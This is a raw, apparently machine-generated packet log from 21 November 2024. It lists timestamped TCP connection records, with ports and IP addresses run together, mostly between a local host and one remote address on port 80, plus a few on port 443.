                                                                                                                                                                      Nov 21, 2024 06:23:37.706840038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.706897020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.706935883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.710002899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.710061073 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.710093975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.713179111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.713259935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.713299990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.716357946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.716404915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.716465950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.719516039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.719562054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.719609022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.722661972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.722707033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.722774982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.725841045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.725933075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.725935936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.728981972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.729027987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.729113102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.732153893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.732201099 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.732265949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.735300064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.735347033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.735413074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.736720085 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.737266064 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.737282038 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.738035917 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.738050938 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.738491058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.738535881 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.738575935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.741617918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.741661072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.741733074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.744802952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.744865894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.744901896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.747967958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.748011112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.748039007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.784154892 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.784215927 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.784265041 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.784508944 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.784532070 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.784554005 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.784562111 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.788360119 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.788420916 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.788527012 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.788731098 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.788743973 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.790327072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.812066078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.812150955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.812208891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.812954903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.813056946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.813102961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.816015959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.816128016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.816173077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.818943024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.819013119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.819056034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.822043896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.822187901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.822232962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.824791908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.836328983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.836395979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.836549044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.837531090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.837582111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.837985039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.838092089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.838135958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.840390921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.840513945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.840559006 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.842813969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.843025923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.843075037 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.845252037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.845273972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.845315933 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.847604036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.847713947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.847754955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.849895954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.850018978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.850063086 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.852279902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.852464914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.852505922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.854525089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.854660988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.854715109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.856739998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.856856108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.856897116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.858949900 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.859055996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.859105110 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.861176968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.861273050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.861315012 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.863323927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.863430977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.863475084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.865479946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.865586996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.865628004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.867542982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.867655993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.867697001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.869632959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.869757891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.869802952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.871722937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.871829987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.871876001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.872998953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.873111963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.873155117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.874279976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.874387026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.874428988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.875575066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.875754118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.875798941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.876821995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.876945019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.876987934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.878190041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.878216028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.878258944 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.879426956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.879498005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.879540920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.880662918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.880785942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.880827904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.881931067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.882014990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.882061005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.883218050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.883337975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.883387089 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.884495974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.884623051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.884674072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.885780096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.885884047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.885930061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.887053013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.887176037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.887221098 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.888351917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.888443947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.888487101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.889616966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.889730930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.889775991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.890868902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.891006947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.891052961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.892167091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.892281055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.892322063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.893444061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.893552065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.893596888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.894746065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.894824982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.894866943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.896018982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.896070957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.896115065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.897298098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.897414923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.897461891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.898564100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.898807049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.898854017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.899832964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.900065899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.900110960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.901094913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.901237011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.901283026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.902374983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.902502060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.902546883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.903839111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.903855085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.903907061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.904949903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.905143976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.905188084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.906229019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.906368017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.906414032 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.907484055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.907514095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.907557011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.908755064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.962198019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.004304886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.004331112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.004380941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.004762888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.005034924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.005079031 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.005141973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.006314993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.006330013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.006359100 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.007632017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.007680893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.007689953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.008853912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.008896112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.008943081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.010162115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.010211945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.010251999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.011398077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.011460066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.028913021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.029062986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.029119968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.029459953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.029581070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.029623985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.030544996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.030687094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.030728102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.031672001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.031797886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.031841040 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.032738924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.032766104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.032814026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.033802986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.033920050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.033976078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.034925938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.034955978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.034998894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.036000967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.036063910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.036124945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.037048101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.037163019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.037209988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.038142920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.038171053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.038219929 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.039222956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.039347887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.039397001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.040302992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.040416956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.040457964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.041461945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.041646957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.041686058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.042486906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.042596102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.042691946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.043570995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.043729067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.043777943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.044646978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.044759989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.044820070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.045721054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.045836926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.045880079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.046809912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.046956062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.047000885 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.047909975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.048023939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.048073053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.048974037 CET8049762185.215.113.16192.168.2.6
